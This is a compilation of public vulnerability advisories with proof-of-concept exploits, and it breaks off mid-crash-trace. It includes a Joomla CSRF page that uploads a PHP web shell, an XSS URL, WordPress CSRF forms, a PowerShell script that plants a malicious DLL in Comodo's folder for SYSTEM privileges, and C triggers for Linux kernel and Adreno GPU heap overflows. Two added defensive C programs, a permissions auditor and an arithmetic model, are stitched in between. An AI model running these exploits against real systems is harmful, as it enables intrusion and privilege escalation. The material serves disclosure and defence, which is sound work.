Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 Insecure File Permissions
Vendor: Crouzet Automatismes SAS
Product web page: http://www.crouzet-automation.com
Affected version: em4 soft (1.1.04 and 1.1.03.01)
M3 soft (3.1.2.0)
Summary: em4 is more than just a nano-PLC. It is a leading
edge device supported by best-in-class tools that enables
you to create and implement the smartest automation applications.
Millenium 3 (M3) is easy to program and to implement; it enables
the control and monitoring of machines and automation installations
with up to 50 I/O. It is positioned right at the heart of the
Crouzet Automation range.
Desc: em4 soft and M3 soft suffer from an elevation of privileges
vulnerability: any authenticated, low-privileged user can replace the
executable file with a binary of their choice. The vulnerability exists
because of improper permissions, with the 'C' (Change) flag granted to
the 'Everyone' group.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5310
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5310.php
25.01.2016
--
C:\Program Files (x86)\Crouzet automation>cacls "em4 soft"
C:\Program Files (x86)\Crouzet automation\em4 soft Everyone:(OI)(CI)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
C:\Program Files (x86)\Crouzet automation>cd "em4 soft"
C:\Program Files (x86)\Crouzet automation\em4 soft>cacls *.exe
C:\Program Files (x86)\Crouzet automation\em4 soft\em4 soft.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet automation\em4 soft\unins000.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet automation\em4 soft>
================================================================================================
C:\Program Files (x86)\Crouzet Automatismes>cacls "Millenium 3"
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3 Everyone:(OI)(CI)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
C:\Program Files (x86)\Crouzet Automatismes>cd "Millenium 3"
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3>cacls *.exe
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3\M3 soft.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3\unins000.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3>
---------------------------------------------------------
RatioSec Research Security Advisory RS-2016-001
---------------------------------------------------------
JSN PowerAdmin Joomla! Extension Remote Command Execution Via CSRF and
XSS vulnerabilities
---------------------------------------------------------
Product: JSN PowerAdmin Joomla! Extension
Vendor: JoomlaShine.com
Tested Versions: 2.3.0
Other Vulnerable Versions: Prior versions may also be affected
Vendor Notification: 28th January, 2016
Advisory Publication: 24th February, 2016
CVE Reference: Pending
RatioSec Advisory Reference: RS-2016-001
Risk Level: High
CVSSv3 Base Score: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
---------------------------------------------------------
RatioSec Research has discovered two cross-site request forgery and
reflected cross-site scripting vulnerabilities in JSN PowerAdmin
Joomla! Extension which can be exploited, respectively, to upload PHP
files and run arbitrary HTML and script code in a user's browser
session in context of the affected web site.
1) The application allows users to perform certain actions via HTTP
requests without performing proper checks to verify the requests
validity. An authenticated user's browser can be forced to upload PHP
files via the extension installer and subsequently execute arbitrary
commands with the web server privileges by tricking the user into
visiting a malicious web site.
2) Input passed to `identified_name` GET parameter when `package` is
set, `option` is set to `com_poweradmin`, `view` is set to
`installer`, and `task` is set to `installer.install` in
`/administrator/index.php` is not properly sanitised before being
reflected. This can be exploited to run arbitrary HTML and script code
in a user's browser session in context of the affected web site.
---------------------------------------------------------
Proof of Concept
Read the advisory details on the RatioSec Research website for the
proof of concept code.
http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/
----------------------------------------------------------
Solution
No official solution is currently available.
----------------------------------------------------------
Timeline
- First contact: 27th January, 2016
- Disclosure: 28th January, 2016. Preliminary date set to 10th February, 2016.
- E-mail notice after no response: 02nd February, 2016
- Advisory Publication: 24th February, 2016
----------------------------------------------------------
Advisory URL
http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/
RatioSec Research
Mail: research at ratiosec dot com
Web: http://www.ratiosec.com/
Twitter: https://twitter.com/ratio_sec
----------------
Proof Of Concept
1) The following HTML page exploits the cross-site request forgery vulnerability and uploads a malicious PHP script system($_GET['cmd']); as /tmp/bd.phtml if visited by a logged-in administrator.
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/no8/joomla/administrator/index.php?option=com_poweradmin&view=installer&task=installer.install", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------167969427914885435381146171168");
xhr.withCredentials = true;
var body = "-----------------------------167969427914885435381146171168\r\n" +
"Content-Disposition: form-data; name=\"package\"; filename=\"bd.phtml\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3cscript language=\"php\"\x3esystem($_GET['cmd']);\r\n" +
"\r\n" +
"-----------------------------167969427914885435381146171168--\r\n" +
"\r\n" +
"\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
The file extension .phtml and the <script language="php"> </script> tags are used here to fool the Joomla API JFile::upload() file validation checks. As a result, the backdoor is installed permanently as /tmp/bd.phtml, which the attacker can later use to obtain full system compromise.
Command Execution
2) The following URL exploits the cross-site scripting vulnerability to execute JavaScript code in a logged-in administrator's browser.
http://localhost/joomla/administrator/index.php?package=foobar&option=com_poweradmin&view=installer&task=installer.install&identified_name=<img+src%3dx+onerror=alert("RatioSecResearch")>
# Exploit Title: Wordpress More Fields Plugin 2.1 Cross-Site Request Forgery
# Date: 28-02-2016
# Software Link: https://wordpress.org/support/plugin/more-fields
# Exploit Author: Aatif Shahdad
# Twitter: https://twitter.com/61617469665f736
# Contact: aatif_shahdad@icloud.com
# Category: webapps
1. Description
The plugin More Fields has CSRF token validation disabled for all functions, including the add box and delete box options. As a result, a specially crafted attacker page could cause
a logged-in administrator to add and delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
2. Proof of Concept
Login as admin to the wp-admin area at http://example.com/wp-admin. Open the following Proof-Of-Concept with the browser that you used to log in.
POC to add box named ‘test’:
--POC begins--
Add Boxes:
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=more-fields&action=save&keys=_plugin%2C57UPhPh&navigation=boxes" method="POST">
<input type="hidden" name="label" value="test" />
<input type="hidden" name="post_types[]" value="press" />
<input type="hidden" name="position" value="left" />
<input type="hidden" name="fields" value="" />
<input type="hidden" name="ancestor_key" value="" />
<input type="hidden" name="originating_keys" value="_plugin,57UPhPh" />
<input type="hidden" name="action" value="save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Remove Boxes needs the following simple GET request (Assuming the name of the Box we want to delete is ‘test’):
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php">
<input type="hidden" name="page" value="more-fields" />
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="action_keys" value="_plugin,test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Note: I have removed the CSRF tokens from the requests as they are redundant and not validated.
--End of POC--
3. Impact
The attacker can add/delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
4. Solution:
Add CSRF token validation to the plugin, or switch to a different plugin. Development of the plugin has ceased, so this is the latest version and no upgrade is available as of now.
<#
SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
###Technical Geeky Stuff###
GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.
The directory listing is as follows:
10/06/2015 12:08 AM <DIR> .
10/06/2015 12:08 AM <DIR> ..
10/02/2015 10:43 PM 27 download.cfg
10/02/2015 10:47 PM 637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015 10:44 PM 2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015 10:44 PM 547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015 12:07 AM 1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015 10:44 PM 554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015 12:06 AM 950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015 12:08 AM 563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015 10:43 PM 768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015 12:08 AM 581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015 10:47 PM 459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015 10:46 PM 1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015 12:07 AM 1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015 12:07 AM 648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015 10:43 PM 1 survey_version.txt
10/06/2015 12:05 AM <DIR> updates
The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access. This allows
non-administrator users the ability to create files in the directory but not delete or modify
existing files.
Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
in the C:\Program Files (x86)\Common Files\COMODO\ folder. This service is auto launched by the
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher
This binary will then launch Unit_Manager.exe in C:\Program Files\COMODO\GeekBuddy with SYSTEM-level
privileges. This binary in turn launches C:\Program Files\COMODO\GeekBuddy\unit.exe
to handle each sub-process in the C:\ProgramData\Comodo\lps4\temp\ folder.
During client connections to update servers and Geek Buddy executions the unit.exe binary will
launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe. This setup binary has
hardcoded DLL loading procedures to look for SHFOLDER.DLL in the current directory which it is
executed from.
.data:00409240 dd offset aShfolder ; "SHFOLDER"
.data:00409244 dd offset aShgetfolderpat ; "SHGetFolderPathA"
During this delay-load procedure the executable loads SHFOLDER.DLL from its own directory before
searching the directories listed in the PATH variable.
By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an
update or client connection to secure servers (which occurs automatically at user login) a user can
elevate their privileges to SYSTEM and compromise the system fully.
######### GREETZ ######################################################################################
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times. C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do. #Ninja
Sizzop - for fixing my greetz
#########################################################################################################
#>
Param
(
[Parameter(ValueFromPipelineByPropertyName = $true)]
[string]$DLL = ""
)
if (!(Test-Path $DLL))
{
throw "Fatal Error: The specified file: $DLL does not exist."
}
Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force
Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info"
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges"
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
$objNotifyIcon.Visible = $True
$objNotifyIcon.ShowBalloonTip(8000)
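The Crouzet cacls listings earlier on this page and the GeekBuddy temp-folder ACL above show the same pattern: a write-capable ACE (the Change flag, or FILE_WRITE_DATA-style special access) granted to a group every local user belongs to. The following C helper is an added example, not code from either advisory: it parses cacls output and reports such ACEs, using a sample constructed from the listings on this page (the principal names beyond those seen here are assumptions).

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#define COUNT(a) (sizeof(a) / sizeof((a)[0]))
/* Principals cacls prints in ACE lines (extend for other well-known SIDs). */
static const char *const KNOWN[] = { "Everyone", "BUILTIN\\Users", "BUILTIN\\Administrators",
    "NT AUTHORITY\\SYSTEM", "NT AUTHORITY\\Authenticated Users", "NT SERVICE\\TrustedInstaller",
    "CREATOR OWNER" };
/* Principals every local, non-admin account belongs to. */
static const char *const LOW_PRIV[] = { "Everyone", "BUILTIN\\Users",
    "NT AUTHORITY\\Authenticated Users" };
/* Special-access rights that let a member create or alter content in the object. */
static const char *const WRITE_RIGHTS[] = { "FILE_WRITE_DATA", "FILE_APPEND_DATA", "FILE_WRITE_EA",
    "FILE_WRITE_ATTRIBUTES", "GENERIC_WRITE", "GENERIC_ALL", "DELETE", "WRITE_DAC", "WRITE_OWNER" };
struct finding {
    const char *principal;   /* who is granted the right */
    char right[32];          /* cacls letter (C, F, W) or the special-access right name */
    char path[200];          /* object the ACE belongs to */
};
static bool in_list(const char *s, const char *const *list, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (strcmp(s, list[i]) == 0) return true;
    return false;
}

/* Locate the earliest "PRINCIPAL:(" in s; returns its start and names the principal. */
static char *find_ace(char *s, const char **name) {
    char *best = NULL;
    for (size_t i = 0; i < COUNT(KNOWN); i++) {
        char *p = strstr(s, KNOWN[i]);
        if (p && strncmp(p + strlen(KNOWN[i]), ":(", 2) == 0 && (!best || p < best))
            best = p, *name = KNOWN[i];
    }
    return best;
}
static void record(struct finding *f, const char *who, const char *right, const char *path) {
    f->principal = who;
    snprintf(f->right, sizeof f->right, "%s", right);
    snprintf(f->path, sizeof f->path, "%s", path);
}
/* cacls prints the object path once, then one ACE per line as "PRINCIPAL:(flags)RIGHT";
   "(special access:)" is followed by one right name per line. Returns the finding count. */
int audit_cacls(const char *text, struct finding *out, int max) {
    int n = 0;
    char line[512], path[200] = "";
    const char *special_for = NULL;   /* low-priv principal whose special-access list is open */
    while (*text) {
        size_t full = strcspn(text, "\n");
        size_t len = full < sizeof line ? full : sizeof line - 1;
        memcpy(line, text, len);
        line[len] = '\0';
        text += full + (text[full] == '\n');
        char *s = line;
        while (*s == ' ' || *s == '\t') s++;
        for (char *e = s + strlen(s); e > s && (e[-1] == ' ' || e[-1] == '\r'); ) *--e = '\0';
        if (*s == '\0' || strchr(s, '>')) continue;           /* blank line or command prompt */
        const char *name = NULL;
        char *ace = find_ace(s, &name);
        if (!ace) {
            if (s[1] == ':' && s[2] == '\\')                    /* path printed on its own */
                snprintf(path, sizeof path, "%s", s);
            else if (special_for && n < max && in_list(s, WRITE_RIGHTS, COUNT(WRITE_RIGHTS)))
                record(&out[n++], special_for, s, path);
            continue;
        }
        special_for = NULL;
        if (ace > s) {                                          /* path precedes the first ACE */
            size_t plen = (size_t)(ace - s);
            while (plen > 0 && s[plen - 1] == ' ') plen--;
            snprintf(path, sizeof path, "%.*s", (int)plen, s);
        }
        if (!in_list(name, LOW_PRIV, COUNT(LOW_PRIV))) continue;
        if (strstr(ace, "(special access:)")) { special_for = name; continue; }
        const char *right = strrchr(ace, ')') ? strrchr(ace, ')') + 1 : ace;
        if (n < max && (!strcmp(right, "C") || !strcmp(right, "F") || !strcmp(right, "W")))
            record(&out[n++], name, right, path);
    }
    return n;
}

/* Constructed sample: lines taken from the two advisories above, as cacls prints them. */
static const char SAMPLE[] =
    "C:\\Program Files (x86)\\Crouzet automation>cacls \"em4 soft\"\n"
    "C:\\Program Files (x86)\\Crouzet automation\\em4 soft Everyone:(OI)(CI)C\n"
    "    BUILTIN\\Users:(OI)(CI)(IO)(ID)(special access:)\n"
    "        GENERIC_READ\n"
    "C:\\Program Files (x86)\\Crouzet automation\\em4 soft\\em4 soft.exe Everyone:(ID)C\n"
    "C:\\ProgramData\\Comodo\\lps4\\temp NT AUTHORITY\\SYSTEM:(OI)(CI)(ID)F\n"
    "    BUILTIN\\Users:(CI)(ID)(special access:)\n"
    "        FILE_WRITE_DATA\n"
    "        FILE_WRITE_EA\n";

int main(void) {
    struct finding f[16];
    int n = audit_cacls(SAMPLE, f, 16);
    for (int i = 0; i < n; i++)
        printf("%-16s %-22s %s\n", f[i].principal, f[i].right, f[i].path);
    return n ? 1 : 0;   /* non-zero exit when something needs attention */
}
```

Read-only special access (GENERIC_READ) and the R right are deliberately ignored, so only ACEs that let an ordinary user plant or replace a file are reported.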
/*
Source: https://code.google.com/p/google-security-research/issues/detail?id=735
In certain kernel versions it is possible to use the AIO subsystem (io_submit syscall) to pass size values larger than MAX_RW_COUNT to the networking subsystem's sendmsg implementation. In the L2TP PPP sendmsg implementation, a large size parameter can lead to an integer overflow and kernel heap corruption during socket buffer allocation. This could be exploited to allow local privilege escalation from an unprivileged user account.
This issue affects 64-bit systems running older branches of the Linux kernel, such as version 3.10 and 3.18. More recent major versions aren't affected due to refactoring in the AIO subsystem. The attached proof-of-concept trigger has been tested on a fully updated Ubuntu 14.04 LTS server. This issue is also likely to affect 64-bit Android devices, which typically use branches of 3.10.
The first observation is that an IOCB_CMD_PWRITE of a large length (such as 0xffffffff) will correctly bound the request iocb's ki_nbytes value to MAX_RW_COUNT. However, in the single vector case, if the relevant access_ok check passes in aio_setup_single_vector then the iov length will still be large (0xffffffff). On 64-bit systems it is possible for access_ok(type, user_ptr, 0xffffffff) to succeed.
The second observation is that sock_aio_write does not use the iocb for the sendmsg size calculation, but instead takes the summation of all input iov lengths. Thus calling io_submit with an IOCB_CMD_PWRITE operation on a socket will result in a potentially large value being passed to sendmsg.
The third observation is that AF_PPPOX sockets using the PX_PROTO_OL2TP protocol have a sendmsg implementation that does not bounds-check the incoming length parameter (called total_len) before using the value to calculate the length of a socket buffer allocation (using sock_wmalloc).
The fourth observation is that the underlying socket buffer allocation routine __alloc_skb uses an "unsigned int" for its size parameter rather than a size_t, and that this value can wrap to a small positive value during the alignment and internal space overhead calculations. This results in a small value being passed to kmalloc for the socket buffer data allocation. Then the size is recalculated using SKB_WITH_OVERHEAD, which effectively re-underflows the size calculation to a small negative value (a large unsigned value). The newly created socket buffer has a small backing data buffer and a large size.
The proof-of-concept trigger crashes when writing the skb_shared_info structure into the end of the socket buffer, which is out-of-bounds. Other corruption may also be possible in pppol2tp_sendmsg/l2tp_xmit_skb/ip_output.
*/
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/aio_abi.h>
int main(int argc, char *argv[]) {
struct sockaddr_pppol2tp sax;
struct sockaddr_in addr;
int s, sfd, ret;
struct iocb *iocbp;
struct iocb iocb;
aio_context_t ctx_id = 0;
void *data;
s = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
if (s == -1) {
perror("socket");
return -1;
}
memset(&sax, 0, sizeof(struct sockaddr_pppol2tp));
sax.sa_family = AF_PPPOX;
sax.sa_protocol = PX_PROTO_OL2TP;
sax.pppol2tp.fd = -1;
sax.pppol2tp.addr.sin_addr.s_addr = addr.sin_addr.s_addr;
sax.pppol2tp.addr.sin_port = addr.sin_port;
sax.pppol2tp.addr.sin_family = AF_INET;
sax.pppol2tp.s_tunnel = -1;
sax.pppol2tp.s_session = 0;
sax.pppol2tp.d_tunnel = -1;
sax.pppol2tp.d_session = 0;
sfd = connect(s, (struct sockaddr *)&sax, sizeof(sax));
if (sfd == -1) {
perror("connect");
return -1;
}
data = mmap(NULL, 0x100001000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (data == MAP_FAILED) {
perror("mmap");
return -1;
}
memset(data, 0x41, 0x100001000);
ret = syscall(__NR_io_setup, 2, &ctx_id);
if (ret == -1) {
perror("io_setup");
return -1;
}
memset(&iocb, 0, sizeof(struct iocb));
iocb.aio_fildes = s;
iocb.aio_lio_opcode = IOCB_CMD_PWRITE;
iocb.aio_nbytes = 0xfffffe60;
iocb.aio_buf = (unsigned long) &data;
iocbp = &iocb;
syscall(__NR_io_submit, ctx_id, 1, &iocbp);
return 0;
}
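The four observations in the report above describe arithmetic that is easy to check in isolation. The C model below is an added example, not part of the Project Zero report or its PoC: it replays the alignment and overhead calculation of __alloc_skb() in 32-bit arithmetic for the PoC's 0xfffffe60 length, and shows a 64-bit bounds check that refuses such a request before the allocator sees it. Assumed constants: 64-byte cache lines, a 320-byte skb_shared_info, power-of-two slab size classes, and 100 bytes of IP/UDP/L2TP/PPP header overhead added by the sendmsg path.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

#define SMP_CACHE_BYTES 64u
#define SKB_SHARED_INFO_SIZE 320u   /* assumed sizeof(struct skb_shared_info) on x86_64 3.10 */
#define MAX_RW_COUNT ((uint64_t)INT32_MAX & ~4095ULL)   /* INT_MAX & PAGE_MASK with 4 KiB pages */
/* Helpers as defined in include/linux/skbuff.h, evaluated here on 32-bit operands. */
#define SKB_DATA_ALIGN(x) (((x) + (SMP_CACHE_BYTES - 1)) & ~(SMP_CACHE_BYTES - 1))
#define SKB_WITH_OVERHEAD(x) ((x) - SKB_DATA_ALIGN(SKB_SHARED_INFO_SIZE))

/* Stand-in for ksize(): the slab hands back the next power-of-two size class (assumption). */
static uint32_t ksize_model(uint32_t req) {
    uint32_t cls = 8;
    while (cls < req) cls *= 2;
    return cls;
}

struct skb_model {
    uint32_t kmalloc_size;   /* bytes actually requested from the allocator */
    uint32_t data_size;      /* what the skb then believes its data area holds */
    bool wrapped;            /* true if any intermediate value wrapped */
};

/* The arithmetic __alloc_skb() performs with its "unsigned int size" parameter.
   "requested" is the size_t total the L2TP sendmsg path computed (headers + total_len). */
struct skb_model alloc_skb_model(uint64_t requested) {
    struct skb_model m;
    uint32_t size = (uint32_t)requested;                  /* truncated at the call boundary */
    uint32_t aligned = SKB_DATA_ALIGN(size);              /* may wrap past 2^32 */
    uint32_t total = aligned + SKB_DATA_ALIGN(SKB_SHARED_INFO_SIZE);   /* may wrap again */
    m.wrapped = (requested > UINT32_MAX) || aligned < size || total < aligned;
    m.kmalloc_size = total;
    /* Recomputed from the real allocation size: underflows when ksize < shared_info size. */
    m.data_size = SKB_WITH_OVERHEAD(ksize_model(total));
    return m;
}

/* Hardened check: do the sum in 64 bits and refuse before the allocator is involved. */
bool skb_size_ok(uint64_t requested) {
    if (requested > MAX_RW_COUNT)        /* the limit the regular write path already enforces */
        return false;
    uint64_t total = ((requested + SMP_CACHE_BYTES - 1) & ~(uint64_t)(SMP_CACHE_BYTES - 1))
                   + SKB_DATA_ALIGN(SKB_SHARED_INFO_SIZE);
    return total <= UINT32_MAX;          /* survives the unsigned int parameter intact */
}

int main(void) {
    /* 0xfffffe60 is the PoC's iov length; the 100 header bytes are an assumption. */
    uint64_t requests[] = { 1500, 0xfffffe60ULL + 100 };
    for (size_t i = 0; i < 2; i++) {
        struct skb_model m = alloc_skb_model(requests[i]);
        printf("request 0x%llx: kmalloc %u bytes, skb believes %u, wrapped=%d, accepted=%d\n",
               (unsigned long long)requests[i], m.kmalloc_size, m.data_size, m.wrapped,
               skb_size_ok(requests[i]));
    }
    return 0;
}
```

With these constants the oversized request becomes a 64-byte kmalloc while the skb records a data size of 0xffffff00, which is the mismatch the report says the skb_shared_info write then trips over.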
/*
Source: https://code.google.com/p/google-security-research/issues/detail?id=734
The Adreno GPU driver for the MSM Linux kernel contains a heap
overflow in the IOCTL_KGSL_PERFCOUNTER_QUERY ioctl command. The bug
results from an incorrect conversion to a signed type when calculating
the minimum count value for the query option. This results in a
negative integer being used to calculate the size of a buffer, which
can result in an integer overflow and a small sized allocation on
32-bit systems:
int adreno_perfcounter_query_group(struct adreno_device *adreno_dev,
unsigned int groupid, unsigned int __user *countables,
unsigned int count, unsigned int *max_counters)
{
...
if (countables == NULL || count == 0) {
kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);
return 0;
}
t = min_t(int, group->reg_count, count);
buf = kmalloc(t * sizeof(unsigned int), GFP_KERNEL);
if (buf == NULL) {
kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);
return -ENOMEM;
}
for (i = 0; i < t; i++)
buf[i] = group->regs[i].countable;
Note that the "count" parameter is fully controlled. Setting count =
0x80000001 will result in min_t returning 0x80000001 for "t", and
kmalloc allocating a buffer of size 0x4. The loop will then overflow
"buf" because "t" is unsigned, i.e. a large positive value.
The bug was added in the following commit:
https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/drivers/gpu/msm/adreno.c?h=aosp-new/android-msm-angler-3.10-marshmallow-mr1&id=b3b5629aebe98d3eb5ec22e8321c3cd3fc70f59c
A proof-of-concept that triggers this issue (adreno_perfcnt_query.c)
is attached. On Android devices /dev/kgsl-3d0 is typically accessible
in an untrusted app domain, so if exploited this issue could be used
for local privilege escalation.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>

struct kgsl_perfcounter_query {
    unsigned int groupid;
    unsigned int *countables;
    unsigned int count;
    unsigned int max_counters;
    unsigned int __pad[2];
};

#define KGSL_IOC_TYPE 0x09
#define IOCTL_KGSL_PERFCOUNTER_QUERY _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query)

int main(void) {
    int fd;
    struct kgsl_perfcounter_query data;
    unsigned int countables[16];

    fd = open("/dev/kgsl-3d0", O_RDWR);
    if (fd == -1) {
        perror("open");
        return -1;
    }

    memset(&data, 0, sizeof(struct kgsl_perfcounter_query));
    data.groupid = 1;
    data.countables = (unsigned int *) &countables;
    data.count = 0x80000001;

    ioctl(fd, IOCTL_KGSL_PERFCOUNTER_QUERY, &data);

    close(fd);
    return 0;
}
Source: https://code.google.com/p/google-security-research/issues/detail?id=651
The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==14146==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a0 at pc 0x000000b2c8eb bp 0x7ffdfc45fa70 sp 0x7ffdfc45fa68
READ of size 1 at 0x6070000003a0 thread T0
#0 0xb2c8ea in print_hex_data_buffer wireshark/epan/print.c:987:13
#1 0xb2bf43 in print_hex_data wireshark/epan/print.c:904:14
#2 0x5422e2 in print_packet wireshark/tshark.c:4155:10
#3 0x53cb2e in process_packet wireshark/tshark.c:3742:7
#4 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#5 0x52c1df in main wireshark/tshark.c:2197:13
0x6070000003a0 is located 0 bytes inside of 65-byte region [0x6070000003a0,0x6070000003e1)
freed by thread T0 here:
#0 0x4d6ce0 in free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30
